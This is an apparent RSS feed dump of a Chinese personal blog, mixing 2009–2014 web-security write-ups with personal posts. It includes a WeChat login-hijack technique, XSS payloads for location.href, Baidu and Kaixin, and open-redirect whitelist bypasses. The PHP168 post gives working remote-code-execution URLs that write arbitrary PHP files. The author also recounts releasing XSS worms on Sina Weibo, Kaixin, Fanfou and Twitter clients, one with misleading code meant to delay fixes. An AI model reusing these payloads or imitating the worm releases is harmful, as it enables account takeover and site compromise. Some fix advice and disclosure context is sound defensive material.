呆子不开口 http://lvwei.me 我是水一样的男子,因为党说我是流动人口 Mon, 22 Sep 2014 18:28:56 +0000 zh-CN hourly 1 http://wordpress.org/?v=4.0.1 聊着聊着我就上了你……的微信(两处都可以劫持微信登录的漏洞) http://lvwei.me/liao-zhuo-liao-zhuo-wo-jiu-shang-liao-ni-di-wei-xin-liang-chu-du-ke-yi-jie-chi-wei-xin-deng-lu-di-lou-dong-395.html http://lvwei.me/liao-zhuo-liao-zhuo-wo-jiu-shang-liao-ni-di-wei-xin-liang-chu-du-ke-yi-jie-chi-wei-xin-deng-lu-di-lou-dong-395.html#comments Mon, 22 Sep 2014 18:28:56 +0000 http://lvwei.me/?p=395 此漏洞已提交至乌云漏洞平台并已公开,官方早已修复,见 http://www.wooyun.org/bugs/wooyun-2010-070454


一、mac版客户端登录的劫持

 

mac版客户端的扫码登录确认页的请求为如下(有些以星号代替了)

http://szsupport.weixin.qq.com/cgi-bin/mmsupport-bin/qrcodelogin?username=*********&key=*************&clientversion=25030133&devicetype=android-18&lan=zh_CN&uuid=AXBIICc4sUSDsFnefkNP&pass_ticket=DebNjGnP2dJnq1bMvHvgL%2BezqqE70Ry9iWB625%2FRT8RRnwCD3tlq3qxuxG5YPzhx

 

经过测试可发现,此请求无需用户扫码动作确认,也没有签名保护,其中username和uuid分别是用户的微信号和二维码字符,很容易得到。key无法被攻击者猜出,但是也可以通过别的方式得到,比如如下方式

微信的公共账号发的文章url为这种:

http://mp.weixin.qq.com/s?__biz=**********==&mid=10000001&idx=1&sn=bdc73ae816f2e7097c225b6070b1f2f2&from=singlemessage&isappinstalled=0#rd

 

在微信中打开这种链接,最终的目标页会被微信浏览器加上key和pass_ticket参数,这样只要我们能在这篇文章中插入个自定义url的图片即可通过referer偷到这个key。公众账号发表的文章不可以直接写自定义的IMG,但通过修改http请求里的参数就可以把图片地址换成我们自己服务器上的url了

这样只要发送给受害者点击,或者欺骗他扫描此链接的二维码,然后就可以得到key,然后拼接那个扫码登录确认页请求,点击确认登录,我们的客户端就可以自动登录了

 


二、网页版微信登录的劫持

 

网页版客户端的扫码登录确认页的请求为如下(有些以星号代替了)

http://login.weixin.qq.com/confirm?uuid=e921eed1fbf84e&key=*****************&lang=zh_CN&scan=1406467880&clientversion=25030133&devicetype=android-18

 

经过测试可发现,此请求也没有签名保护,但需用户扫码动作确认,其中uuid分别是二维码字符,很容易得到。key的话也可以通过如上方式获得。所以我们需要做的就是再让用户扫下码。

网页版二维码链接原文是这种:

https://login.weixin.qq.com/l/e921eed1fbf84e,经测试发现,可以直接把这个链接发送给用户访问,也可以达到用户扫描的效果

这样只要给受害者发送两个链接诱惑他点击,或者让他点击一个页面然后诱惑他去扫描内容中的二维码,就可以得到key,并让我们的请求合法。然后再拼接那个扫码登录确认页请求,点击确认登录,我们的网页版就可以自动登录了

 


漏洞证明:

首先在公众账号的内容中加入自定义图片

/feed/rss/QQ20140731_1.png

mac客户端劫持:

先发送欺骗她点击

IMG_0962.PNG

然后我会收到

/feed/rss/QQ20140731_72x.png

然后在浏览器点击确认登录

/feed/rss/QQ20140731_62x.png

最后登录成功

/feed/rss/QQ20140731_52x.png

网页版微信劫持:

先聊

/feed/rss/1.pic.jpg

然后收到key

/feed/rss/QQ20140731_3.png

/feed/rss/QQ20140731_2.png

/feed/rss/QQ20140731_1.png

修复方案:

如果没有需求,尽量公共账号发的消息文章中不允许有自定义src的图片

保护好get参数key不被referer等泄露,如果可以尽量用post

mac版的扫码登录需要做成和网页版一样,需要用户扫码确认才可以

对登录确认页的参数进行签名校验

等等……

]]>
http://lvwei.me/liao-zhuo-liao-zhuo-wo-jiu-shang-liao-ni-di-wei-xin-liang-chu-du-ke-yi-jie-chi-wei-xin-deng-lu-di-lou-dong-395.html/feed 0
调皮的location.href http://lvwei.me/naughty-location-href-375.html http://lvwei.me/naughty-location-href-375.html#comments Sat, 25 Jan 2014 18:19:37 +0000 http://lvwei.me/?p=375 0x00 背景

随着水瓶月的到来,在祖国繁荣昌盛的今天,web系统的浏览器端也越来越重,很多的功能逻辑都放在了js中,前端的漏洞也越来越多。 我今天就说说location.href跳转的一些问题。

前端跳转常见的代码形式是:

1
location.href = 'http://www.baidu.com';

 

在前端js中有可能是这样:

1
2
3
4
5
6
var hash = location.hash;
if(hash)
{
var url = hash.substring(1);
location.href = url;
}

0x01 常见的跳转漏洞


什么是跳转漏洞?突破了系统预期的跳转,就是跳转漏洞。大多数系统的预期是跳转到当前域url的http访问。

以上面的代码为例,hash值为攻击者可控,常见的漏洞形式可以为:

http://yigezangpao.com/test.html#http://jiajiba.taobao.com

这个地址会利用信任关系跳转到钓鱼网站

http://yigezangpao.com/test.html#javascript:alert(document.cookie)

这个会跳转到浏览器端的javascript协议而执行js,成了一个反射的xss,而且浏览器端的xssfilter对它无效

0x02 跳转漏洞的危害


可能的危害场景如下:

受害用户被骗点击进入了钓鱼站,可导致家破人亡妻离子散被网友拉黑……

在一些sns网站中,点击第三方网站时,可能会有安全提示,恶意网址则可利用信任域的身份,绕过了检查。

很多app带有二维码扫描功能,对本域或白名单域会不做提示,直接跳转访问。

当你扫描一个二维码的时候,你可能已经点击了一个恶意或含有某种攻击代码的网页javascript为协议的反射型xss。

一般的社区发表链接时,不会自动识别浏览器的伪协议,不会形成可点击的链接,但是利用跳转漏洞,则可以欺骗目标用户打开某个浏览器伪协议……

0x03 目前的防护的一些问题


我见到的常见的有防护有:

给变量前加"/index.html"或者只有"/index.html"开头的才跳转
替换变量中的":"
替换"http://"
匹配域名白名单
……

这几类或多或少有些问题,如下:

对于在变量前加/的,或者/开头才跳转的,他们预期的是控制在本域下。但当

1
location.href = "//diaoyuwangzhan.com"

时,浏览器会把后面的识别成一个标准的url来跳转,而不是一个绝对路径。

对于允许第三方跳转的,匹配域名白名单的,一定要写好正则的逻辑严格匹配url的标准格式,否则可能会被

http://yigezangpao.com.jiajiba.taobao.com

http://yigezangpao.com@jiajiba.taobao.com


http://jiajiba.taobao.com/yigezangpao.com

等绕过

对于替换”:“的防护:

twitter曾经犯过这样的错,twitter的程序员是这样改的:

1
var c = location.href.split("#!")[1];
    if (c) {
    window.location = c.replace(":", "");
    } else {
    return true;
    }

结果又被如下链接干:

http://twitter.com/#!javascript::alert(document.domain); 

比第一次多了个:

因为replace()函数的第一个参数,按照规范中的方式,是要用正则写的。如果第一个参数是一个字符串,javascript默认只会替换掉他找到的第一个字符

0x04 比杨幂还神奇


对于上面的替换”:”的方案,如果完全替换,是不是就没有问题了呢?

如果你曾觉得你的女友不可理喻,那么当我告诉你有一个东西的不可理喻程度已经达到你女友的50%时,你一定会惊呼,”天呐,竟然还有这么变态的东西!!!“ 不错,你猜的非常对,这个不可理喻的东西就是ie浏览器

如前文的例子,如果对方已经完全替换”:”,你试试在ie中访问如下链接

http://yigezangpao.com/test.html#javascript:alert(1)

也就是

1
location.href = "javascript:alert(1)"

你会惊奇的发现弹了,':'是':'的html编码,至于为什么会这样我不知道,我的是ie11,其他版本没测

0x05 解决方案


对于不允许跳转到第三方的,可以使用location.pathname来跳转,用这个跳转绝对靠谱。

有句成语”path就不是共产党员“就是修饰这个属性的,既然不是共产党员,说明path是靠谱的。

对于允许跳转到第三方的,做好白名单的检查规则。

]]>
http://lvwei.me/naughty-location-href-375.html/feed 1
百度首页反射半自动存储xss http://lvwei.me/baidu-home-reflection-semiautomatic-stored-xss-2-322.html http://lvwei.me/baidu-home-reflection-semiautomatic-stored-xss-2-322.html#comments Mon, 06 May 2013 05:38:16 +0000 http://lvwei.me/?p=322 注:此漏洞已经在乌云上提交和公开,并且百度已经确认修复

chrome和ff下有效,IE没测,需要百度用户在登陆状态下

百度首页搜索汉字超过两个后,会把搜索内容及拼音写入浏览器的localstorage,当你再次搜索类似的词时,会在下拉框自动填充,但在当你输入的是字母时,自动响应出的汉字对应内容没有进行html转义

baidu
我们可以很简单的iframe一个构造好的搜索结果页来让用户浏览,如

<iframe src='http://www.baidu.com/s?wd=%E5%BE%AE%E5%8D%9A%3Cimg+src%3D1+onerror%3Dalert%281%29%3E' width='0' height='0'></iframe>
<img src=美女高潮图>

以后当用户再搜索或误输入”weib” “weibo”等字符时,就会执行我们的代码

这个漏洞比较难利用,可以写入localstorage的搜索内容有长度要求,可利用部分很短,自动填充用的是innerhtml,<script>无效。但由于每次可以显示两条,所以通过两次拼接,还是可以实现弹窗钓鱼或者转向广告业恶意页等,还是有一定危害。比如如下代码

<iframe src='http://www.baidu.com/s?wd=搜索<img+src+onerror%3Dlocation.href%3Da>' width='0' height='0'></iframe>
<iframe src='http://www.baidu.com/s?wd=搜索<img+src+onerror%3Da%3D%27%2F%2Fso.com%27>' width='0' height='0'></iframe>
<img src=美女完事累坏了图>

访问这样的页面后,以后在百度搜索框里只要敲”sous””sousu””sousuo”等都会跳到360搜索,如果中标方是个有文采的互联网达人,此人会立马在微博上惊呼“天呐,360搜索加入了百度的阿拉丁计划”

]]>
http://lvwei.me/baidu-home-reflection-semiautomatic-stored-xss-2-322.html/feed 2
twitter的localStorage的xss http://lvwei.me/twitter-of-the-xss-localstorage-315.html http://lvwei.me/twitter-of-the-xss-localstorage-315.html#comments Fri, 21 Oct 2011 16:17:19 +0000 http://lvwei.me/?p=315 localStorage是html5里的一个概念,可以用于浏览器端的本地存储,以domain区分

twitter的localStorage里的内容可以xss,虽然很鸡肋,但很好玩

如果你让我用了你的电脑,我就可以钓鱼盗你的号,泡你的粉丝了……

如果再有个反射xss配合种localStorage,那就无敌了,只要用户点了你的链接后,就等于种下一个存储型的xss了

而且localStorage的优点是比cookie时间长,普通用户还注销不了

可能是html5的东西刚开始流行,程序员们还没重视,基本对localStorage里的内容不加过滤验证就直接在页面使用了

看了下腾讯微博的,也有类似的问题

html5是好东西,程序员和黑客都喜欢

]]>
http://lvwei.me/twitter-of-the-xss-localstorage-315.html/feed 0
火狐微博图片粘贴扩展地址更新 http://lvwei.me/firefox-extension-microblogging-paste-the-picture-address-update-307.html http://lvwei.me/firefox-extension-microblogging-paste-the-picture-address-update-307.html#comments Fri, 17 Jun 2011 19:45:38 +0000 http://lvwei.me/?p=307 火狐官方上的地址不知道为何不好用了,可能没通过审核

本来也没打算再管了,但微博上有网友要此扩展,所以把扩展传上来了

前段网易微博的页面更新了,所以扩展在网易微博有点问题,此版本也顺便修复了这个问题

新地址在下面:http://lvwei.me/TImgPaste.xpi

]]>
http://lvwei.me/firefox-extension-microblogging-paste-the-picture-address-update-307.html/feed 0
五一国际劳动节放一天假 http://lvwei.me/may-day-a-day-off-303.html http://lvwei.me/may-day-a-day-off-303.html#comments Tue, 26 Apr 2011 16:40:35 +0000 http://lvwei.me/?p=303 先推荐下我一年前做的微博应用,月老爱配对 http://weibo.com/tyuelao 。当时做完后就没管了,没想到竟然在4.19号这天借facebook的光火起来了。因为最近有个新闻说facebook推出了一个叫暗恋的应用,跟我这个功能类似。很多人说我这个应用山寨了facebook。也真有可能是,但我已经记不清了,一年前的事了,太久远了。在这个社会主义初级阶段,崇洋媚外总算是个优点,我也就不是很在意了,逗了他们几下下

最近我算是悟透了一个道理,那就是吃小便宜占大亏

我的这个博客这几天换了个空间,因为vps挂了,还丢了些数据。便宜没好货啊,看来观音姐姐说的是对的。当初买的是15美元一年的nordicvps的128m的vps,当时追求的是性价比。的确性价比还是不错的,哪怕它不保证你数据的安全,自己做好备份,拿来玩还是超级好的。那个vps到现在还没恢复,而且老外的回复也很有意思,说数据恢复不了了,而且这几天复活节他们要休息,等过节了再修。谁让咱用的是便宜货呢,只能等了

买了个一美元三年的无限制的主机套餐,当测试空间是再好不过了。控制面板是cpanel的,cpanel的控制面板添加域名的时候,也可以不用把ns给指过去,只要保证你添加的域名还没有解析就可以了。你可以添完了再解析,若域名是已经解析过的,那就先删掉这个域名的记录。网上的这方面教程太少,走的还都是弯路。

买了个dreamhost的第一年9美元的套餐。结果又是因为贪便宜丢了一个我认为还不错的域名weibojiaoyou.com。我没有在第一时间去godaddy花钱注册,因为dreamhost的套餐里面有个免费域名,所以我就把这个域名绑在dreamhost的套餐上了。结果就是在我等待dreamhost审核的时候,第二天这个域名就被别人注册了,是个中国的域名代理商。这点我也想到过,但侥幸心让我忽略了这点,没想到真的被我碰上了。所以我甚至阴谋的认为,域名代理商和运营商勾结,在监听几个大域名商的注册域名的请求包

因为中国很多人用dreamhost乱搞,所以dreamhost的优惠套餐对中国用户审核很严。我的等了三天还没审核下来,于是我就每天发一封ticket,最后一封很严厉的对他们说,要么通过,要么赶紧退钱,老子是个很穷的中国人。结果竟然顺利通过审核了。可能他们考虑了中国的人权状况,发了善心。

这几天又贪图便宜注册了雅虎的1.99美元优惠域名,结果很快就被删掉了,因为很多中国人用这些优惠域名做垃圾站,然后也不续费。可悲的是域名已经被雅虎注册了,等它那失效还不知道具体是哪天,可能会被别人注册。所以我只能硬着龟皮头再去reactive,交足了全额,不敢再用优惠码,没想到还是删。换成注册两年的,还是删。最后无奈发了个邮件,问他们到底想怎么样,他们说可能是支付的卡出问题了。于是我又改用信用卡直接付费了,不走paypal了。现在还在等消息,又是贪便宜惹的麻烦

我这个蠢货,每天打车上班二三十,出去桌游加打车上百,出去踢球加打车上百,何苦去省那几美元。看来女人购物的愚蠢基因,男人骨子里也有的。大家享受的都是这个解决问题的过程

有域名空间需求的可以找我代购,价格合理,童叟无欺。重要的域名一定要第一时间就去注册,不要贪小便宜

]]>
http://lvwei.me/may-day-a-day-off-303.html/feed 2
firefox扩展:新浪微博图片粘贴 http://lvwei.me/firefox-extension-sina-microblogging-paste-a-picture-297.html http://lvwei.me/firefox-extension-sina-microblogging-paste-a-picture-297.html#comments Wed, 20 Apr 2011 18:11:41 +0000 http://lvwei.me/?p=297 花了两个晚上写的,在windows下预期功能全实现了
支持发微薄时粘贴图片,直接ctrl+v或右键选择“微博图片粘”即可。图片来源可为本地复制,屏幕截图,页面上右键复制的图片等……目前只支持新浪微博

扩展地址在这 https://addons.mozilla.org/zh-CN/firefox/addon/timgpaste/

此扩展火狐那边的地址不知道为什么不好用了,新地址在这 http://lvwei.me/TImgPaste.xpi

update:目前也支持网易微博了~

]]>
http://lvwei.me/firefox-extension-sina-microblogging-paste-a-picture-297.html/feed 1
腾讯微博xss http://lvwei.me/tencent-microblogging-xss-292.html http://lvwei.me/tencent-microblogging-xss-292.html#comments Wed, 20 Apr 2011 18:06:47 +0000 http://lvwei.me/?p=292 这个博客在我玩完wordpress后就基本又没更新过了
真的有点愧对这个自己亲手改的完美(虽然别人不承认)的豆瓣风格皮肤了
我很奇怪我都改成豆瓣风格了,为什么还没人来留言要求合体呢
难道豆瓣不是亚洲最大的色情交友中心么,难道小跑和大力是骗我的么
年纪大了,不写诗了,写点别的吧

今年是一个意义重大的一个一年
我突然想到,以我的年纪,经常晚上一次买三根冰棍边走边吃是有点不妥的了
哪怕我小时候一次能吃10根
年纪的量变,逼着我去质变
今年本打算竭力达成一个目标,不料有点变故让这个目标难度大了点
于是我又决定淡定的面对这一切
工作,学习,娱乐,睡觉,踢球,过好每一天

希望膝盖能快点好起来
希望苗苗中考成功
希望家人亲戚都开心顺利
希望中大奖

回到标题的内容
通过直觉找到了腾讯微博一个xss,火狐下无效,其他的好像都可以
没什么好玩的了,先攒着再说

]]>
http://lvwei.me/tencent-microblogging-xss-292.html/feed 1
国产3D爱情片《肉蒲团》预告片 http://lvwei.me/3d-meat-of-domestic-futon-283.html http://lvwei.me/3d-meat-of-domestic-futon-283.html#comments Fri, 14 Jan 2011 04:16:08 +0000 http://lvwei.me/?p=283 听说国产3D爱情片《肉蒲团》预告片出来了,而且好像还有无码露点镜头
我很愤怒,我不敢相信这是真的,这种预告片要是被青少年看到的话,那毒害得有多大啊
所以我去网上找到了这个预告片,看看到底有没有露点,如果有的话,我一定要把它揪出来
看完后,我震惊了,好像真的有露,但我不知道我判断的是否准确
现在发出来让大家鉴别下,如果真的有露点的话,我们一定要记住这个视频的情节,下次遇到这个视频,坚决不传播
点击这里下载

]]>
http://lvwei.me/3d-meat-of-domestic-futon-283.html/feed 0
把新浪博客搬出来了 http://lvwei.me/sina-blog-to-come-out-273.html http://lvwei.me/sina-blog-to-come-out-273.html#comments Thu, 13 Jan 2011 07:02:33 +0000 http://lvwei.me/?p=273 把新浪博客搬出来了,弄了个独立的,用http://lvwei.me访问

用的是伍德派斯写的程序,主题用的是wlsy这个主题,感谢他,愿佛祖保佑他平安

自己也改了下css,往豆瓣的风格上靠了靠

用独立博客好处多多,控制自由,没人管得着,访客信息来源清晰,还能装逼,写诗也更有灵感

当然,最重要的原因是我花1.99英镑买了lvwei.me这个域名

花了这么多钱,不弄个博客怪可惜的

刚搭建好,可能还有很多问题

]]>
http://lvwei.me/sina-blog-to-come-out-273.html/feed 5
保护你的蠕虫,善待你的孩子 http://lvwei.me/%e4%bf%9d%e6%8a%a4%e4%bd%a0%e7%9a%84%e8%a0%95%e8%99%ab%ef%bc%8c%e5%96%84%e5%be%85%e4%bd%a0%e7%9a%84%e5%ad%a9%e5%ad%90-34.html http://lvwei.me/%e4%bf%9d%e6%8a%a4%e4%bd%a0%e7%9a%84%e8%a0%95%e8%99%ab%ef%bc%8c%e5%96%84%e5%be%85%e4%bd%a0%e7%9a%84%e5%ad%a9%e5%ad%90-34.html#comments Sun, 28 Nov 2010 16:19:27 +0000 http://lvwei.me/%e4%bf%9d%e6%8a%a4%e4%bd%a0%e7%9a%84%e8%a0%95%e8%99%ab%ef%bc%8c%e5%96%84%e5%be%85%e4%bd%a0%e7%9a%84%e5%ad%a9%e5%ad%90/ 今天测试了一个蠕虫,没干什么坏事
主要在保护蠕虫上下了点功夫
而且还给出了些错误的迷惑代码,能耽误别人修复BUG
果然蠕虫过了几个小时停了后,那个BUG还在,到目前还没被修复
饭否可能也还没发现,因为他们在处理了蠕虫后,却修复了知道创宇前两天公布的一个他们的BUG
那个BUG我也发现了,但看有人公布了,我就没再用了
具体我的保护蠕虫的方法,过两天有时间写一下
关于那个BUG,我也正在联系饭否

]]>
http://lvwei.me/%e4%bf%9d%e6%8a%a4%e4%bd%a0%e7%9a%84%e8%a0%95%e8%99%ab%ef%bc%8c%e5%96%84%e5%be%85%e4%bd%a0%e7%9a%84%e5%ad%a9%e5%ad%90-34.html/feed 5
PHP168 V6.02整站系统远程执行任意代码漏洞的利用方法 http://lvwei.me/php168-v6-02%e6%95%b4%e7%ab%99%e7%b3%bb%e7%bb%9f%e8%bf%9c%e7%a8%8b%e6%89%a7%e8%a1%8c%e4%bb%bb%e6%84%8f%e4%bb%a3%e7%a0%81%e6%bc%8f%e6%b4%9e%e7%9a%84%e5%88%a9%e7%94%a8%e6%96%b9%e6%b3%95-35.html http://lvwei.me/php168-v6-02%e6%95%b4%e7%ab%99%e7%b3%bb%e7%bb%9f%e8%bf%9c%e7%a8%8b%e6%89%a7%e8%a1%8c%e4%bb%bb%e6%84%8f%e4%bb%a3%e7%a0%81%e6%bc%8f%e6%b4%9e%e7%9a%84%e5%88%a9%e7%94%a8%e6%96%b9%e6%b3%95-35.html#comments Sun, 12 Sep 2010 19:38:02 +0000 http://lvwei.me/php168-v6-02%e6%95%b4%e7%ab%99%e7%b3%bb%e7%bb%9f%e8%bf%9c%e7%a8%8b%e6%89%a7%e8%a1%8c%e4%bb%bb%e6%84%8f%e4%bb%a3%e7%a0%81%e6%bc%8f%e6%b4%9e%e7%9a%84%e5%88%a9%e7%94%a8%e6%96%b9%e6%b3%95/ 一个朋友发来这个漏洞,说是不好利用
漏洞描述给出的例子phpinfo()简直是糊弄人的
我看了下漏洞的代码,试了下,如下方法可以利用,在魔术引号开了的情况下也可

我试出两种方式:
http://www.XXXX.com/member/post.php?only=1&showHtml_Type[bencandy][1]={${$ppp = fopen(‘xixi.php’,’w’) and fwrite($ppp,’test’) and print(‘111′) and ($filename_b = stripcslashes($filename_b))}}&aid=1&job=endHTML
这种会执行两次,第二次会成功

http://www.XXXX.com/member/post.php?only=1&showHtml_Type[bencandy][1]={${$ppp = fopen(stripcslashes($_GET[path]),’w’) and fwrite($ppp,’hello’) and print(‘111′) and ($filename_b = stripcslashes(null))}}&aid=1&job=endHTML&path=./../index1.php
这种只执行一次,不过自己得多写个参数

]]>
http://lvwei.me/php168-v6-02%e6%95%b4%e7%ab%99%e7%b3%bb%e7%bb%9f%e8%bf%9c%e7%a8%8b%e6%89%a7%e8%a1%8c%e4%bb%bb%e6%84%8f%e4%bb%a3%e7%a0%81%e6%bc%8f%e6%b4%9e%e7%9a%84%e5%88%a9%e7%94%a8%e6%96%b9%e6%b3%95-35.html/feed 1
twitter大中华区伪跨站 http://lvwei.me/twitter%e5%a4%a7%e4%b8%ad%e5%8d%8e%e5%8c%ba%e4%bc%aa%e8%b7%a8%e7%ab%99-36.html http://lvwei.me/twitter%e5%a4%a7%e4%b8%ad%e5%8d%8e%e5%8c%ba%e4%bc%aa%e8%b7%a8%e7%ab%99-36.html#comments Tue, 30 Mar 2010 14:30:17 +0000 http://lvwei.me/twitter%e5%a4%a7%e4%b8%ad%e5%8d%8e%e5%8c%ba%e4%bc%aa%e8%b7%a8%e7%ab%99/ 今天放在国内的twitter客户端上的蠕虫果然也还算猛。不过仅仅是发个推,关注下我,没干别的坏事,但是某些敏感的极端右派还是有很多感觉很受伤,甚至将我描绘成了共产主义的接班人,竟然认为我是公匪派来摧毁所有第三方客户端的,晕死,我又不是奥特曼,我怎么会那么强大。而且在我解释了以后,竟然有人还这么认为,再怎么说我的twitter签名也是个右派的签名啊,而且我基本只玩新浪微博,不玩推特,但还是搭建了个推特中文圈,这是多么雷锋的精神啊,唉,真是为中国的民主化进程感到担忧

twitter的安全的确做的很棒,想在那上面玩跨站基本没戏
但由于国情的原因,国内的twitter用户大多用的都是客户端,所以如果跨了这些客户端,也基本能达到twitter大中华区伪跨站的效果,于是我看了下用的最广的推特中文圈的代码,有些反射的xss,但总感觉用的会不爽,因为推特客户端种类很多,我不至于每个都去找XSS啊,于是想到了最原始的远程form提交,试了下,果然没做http referer判断,再看下别的客户端,果然也没有限制,基本上可以搞定大部分的客户端了

很快一个思路就有了,原理很简单,技术超简单。建一个页面a.php,放个美女图片,再iframe几个自动提交表单的页面b.php,c.php,因为不同的客户端提交地址会不同,我只加了两种,不过好像可以囊括大部分种类的客户端,a.php把http referer中的蠕虫所在网站的地址传给b.php,c.php,b.php,c.php再去自动提交发布推特,里面包含着随机的诱惑性话语和一个链接地址

然后我再亲自亲手在客户端里点下链接,诱惑性话语就发到自己的推特上了,基本上受过9年制义务教育的男女人看到后都会去点,然后就……,这样就可以跨好多站了,这种情况也就是在客户端这种应用上可以出现

很多半瓶子醋的人看到了我记录了客户端的地址,就说我是在收集第三方推特站的地址然后上交给国务院,心理真够阴暗的,希望你现在能看懂我为什么要记地址了

 

]]>
http://lvwei.me/twitter%e5%a4%a7%e4%b8%ad%e5%8d%8e%e5%8c%ba%e4%bc%aa%e8%b7%a8%e7%ab%99-36.html/feed 12
新浪微博15分钟xss http://lvwei.me/%e6%96%b0%e6%b5%aa%e5%be%ae%e5%8d%9a15%e5%88%86%e9%92%9fxss-37.html http://lvwei.me/%e6%96%b0%e6%b5%aa%e5%be%ae%e5%8d%9a15%e5%88%86%e9%92%9fxss-37.html#comments Mon, 21 Sep 2009 06:05:08 +0000 http://lvwei.me/%e6%96%b0%e6%b5%aa%e5%be%ae%e5%8d%9a15%e5%88%86%e9%92%9fxss/ 我忙了一天,结果蠕虫才传播了15分钟就被干掉了,还是在夜里三点。不过传播很猛,后来新浪微博的人还加了我的MSN,还很客气,真的是处理速度和处理态度都比开心网强多了。开心网上次删了我的很多东西
不过我知道是我做了错事,原则我还是知道的,具体攻击细节,等有时间等好好写下来,超级复杂的过程

]]>
http://lvwei.me/%e6%96%b0%e6%b5%aa%e5%be%ae%e5%8d%9a15%e5%88%86%e9%92%9fxss-37.html/feed 10
迎接日全湿,勃一下 http://lvwei.me/%e8%bf%8e%e6%8e%a5%e6%97%a5%e5%85%a8%e6%b9%bf%ef%bc%8c%e5%8b%83%e4%b8%80%e4%b8%8b-38.html http://lvwei.me/%e8%bf%8e%e6%8e%a5%e6%97%a5%e5%85%a8%e6%b9%bf%ef%bc%8c%e5%8b%83%e4%b8%80%e4%b8%8b-38.html#comments Mon, 20 Jul 2009 16:06:29 +0000 http://lvwei.me/%e8%bf%8e%e6%8e%a5%e6%97%a5%e5%85%a8%e6%b9%bf%ef%bc%8c%e5%8b%83%e4%b8%80%e4%b8%8b/ 上周二办完了辞职手续,双方协议分手,财产归公司所有,办公大楼我没要,当然,公司也没说要给。办离职手续时需要很多人签字,才发现,公司竟然还有这么多地方我没来过,还有这么多的同事我没见过。这样也好,没太多感情的牵挂。

周二晚上和一起离职的测试部的哥们共同请大家吃了顿饭。对领导的感谢,对男同事的不舍,对女同事的更不舍,对未来的纠结,全随着酒,肉,白菜,四季豆,米饭,等一起痛快吐出。那天晚上大家说的黄色笑话是有史以来最多的,也是最恶心的。

我的离去,让部门的扯淡文化,烟文化,足球文化,黄色文化,赌博文化都遭受了重创。特别是赌博文化,那可是我一手靠输钱建立的啊。不过领导应该可以欣慰了。

至于离职的原因,牵扯到很多,宇宙的起源,人性的贪婪,中国民主化进程,生命的短暂,金融危机,房产泡沫,……无所不涉。

浑浑噩噩的休息了几天,每天半个西瓜两碗饭,兴奋在长夜漫漫,白天睡的是天昏地暗。

周六出去踢了场球,大场地,牛博队对对手队,我们大胜。
周日出去踢了场球,大场地,先农坛体育场,代表原公司和央行的客户踢了一场,我们大胜,晚上还陪客户吃了一顿。销售很高兴,客户也很高兴,我们白踢白吃,更是高兴。唉,纳税人的钱啊,就这样被我们白白糟蹋了。小姐的睡,农民工的累,中产阶级的税,党员生活保障三大支柱啊。

今天是到新公司上班的第一天,装开发环境装了一天,我也装儒雅装了一天。

技术部的同事们第一感觉都还不错。至于其他部门的同事,还没接触,印象不详,男的没细看,也不敢细看,怕误会。女的倒是想细看,没好意思细看,怕误会。总体印象,狼多肉少。

办公环境跟原公司完全两个风格,各有特色。但都有共同点,就是都有大量的声音发出。天融信是上百台防火墙发声,新公司则是电话销售的声音。

而我又要拾起丢了一年多的web开发,甚至还要去做flex。暂先告别c++了,还有我刚涉足的silverlight。

回来的地铁上,旁边坐着一个初中生小姑娘,白皙水嫩的皮肤。我当时就感概的想,叔叔当年也像你这么嫩过。

]]>
http://lvwei.me/%e8%bf%8e%e6%8e%a5%e6%97%a5%e5%85%a8%e6%b9%bf%ef%bc%8c%e5%8b%83%e4%b8%80%e4%b8%8b-38.html/feed 6
http://lvwei.me/%e5%8c%85-39.html http://lvwei.me/%e5%8c%85-39.html#comments Fri, 01 May 2009 15:02:12 +0000 http://lvwei.me/%e5%8c%85/ 昨天包落地铁上了,手机,钱包,身份证,银行卡,工卡,内存条,烟,打火机,钥匙全丢了
发了短信,我的手机已关机,地铁站说了,几个站点都没发现,心碎,估计已经被不熟悉的陌生人保管了
报应啊,偏偏我今天包里多了个内存条,正好就今天丢了,我小的时候偷过西瓜,真的是报应啊,出来混迟早是要还的
回去折腾了下,把信用卡挂失了,其他的得等补办身份证才能办
洗澡时,暗自发誓,我要报复这个社会,这时候,发现房东失踪了好久的小乌龟跑出来了,我突然想起,我是上帝走失的爹,第八感强烈的告诉我,我的命运不该如此,于是我高高兴兴的睡觉去了
所以,一早,我们接到了我手机打来的电话,让我下午去取包
取了包,给了他200,很感谢他,还是好心人多,他说我手机没电了,回去充了一夜电,而且昨晚也太累,所以早上才给我打电话,但我还是很感谢他了

]]>
http://lvwei.me/%e5%8c%85-39.html/feed 13
又一个开心网漏洞 http://lvwei.me/%e5%8f%88%e4%b8%80%e4%b8%aa%e5%bc%80%e5%bf%83%e7%bd%91%e6%bc%8f%e6%b4%9e-40.html http://lvwei.me/%e5%8f%88%e4%b8%80%e4%b8%aa%e5%bc%80%e5%bf%83%e7%bd%91%e6%bc%8f%e6%b4%9e-40.html#comments Mon, 27 Apr 2009 08:47:23 +0000 http://lvwei.me/%e5%8f%88%e4%b8%80%e4%b8%aa%e5%bc%80%e5%bf%83%e7%bd%91%e6%bc%8f%e6%b4%9e/ 测试链接 http://www.kaixin001.com/home/?_preview=other%22;alert(/aaa/);ab=%22as
现已经被封,跟上次一样,我又恶作剧了一把,蠕虫活了几个小时,但效果没上次广泛
这个漏洞很简单,但是那个参数不是用户输的,所以别人可能没检测到

]]>
http://lvwei.me/%e5%8f%88%e4%b8%80%e4%b8%aa%e5%bc%80%e5%bf%83%e7%bd%91%e6%bc%8f%e6%b4%9e-40.html/feed 0
开心网xss漏洞 http://lvwei.me/%e5%bc%80%e5%bf%83%e7%bd%91xss%e6%bc%8f%e6%b4%9e-41.html http://lvwei.me/%e5%bc%80%e5%bf%83%e7%bd%91xss%e6%bc%8f%e6%b4%9e-41.html#comments Sat, 25 Apr 2009 15:55:50 +0000 http://lvwei.me/%e5%bc%80%e5%bf%83%e7%bd%91xss%e6%bc%8f%e6%b4%9e/ 这两天在研究开心网的偷菜,想弄个自动偷菜的程序,(我当然不会是喜欢偷菜,开心网那些互动基本提不起我的兴趣,是为了小乖猫而已)忽然想起开心网互动性这么强,会不会有什么XSS或csrf漏洞什么的呢,所以我就开始试着找了
想起最近开心网新出了个转贴的组件,直觉告诉我那可能有问题,要不为什么在我想研究开心网的时候推出呢,呵呵
去看了一下,发现转贴的链接地址是以这种形式打开的onclick=“javascript:showOtherUrlView(‘http://www.topsec.com.cn’,’view_5715644_3025611′);”,这个函数会先判断你的链接是不是开心网的,是的话直接打开,不是的话会有警告提示
直觉告诉我可以利用,要不他为什么要弄得这么麻烦呢,越麻烦越危险。思考了下,我构造了一个这样的链接http://www.kaixin001.com’,”);alert(‘test’);
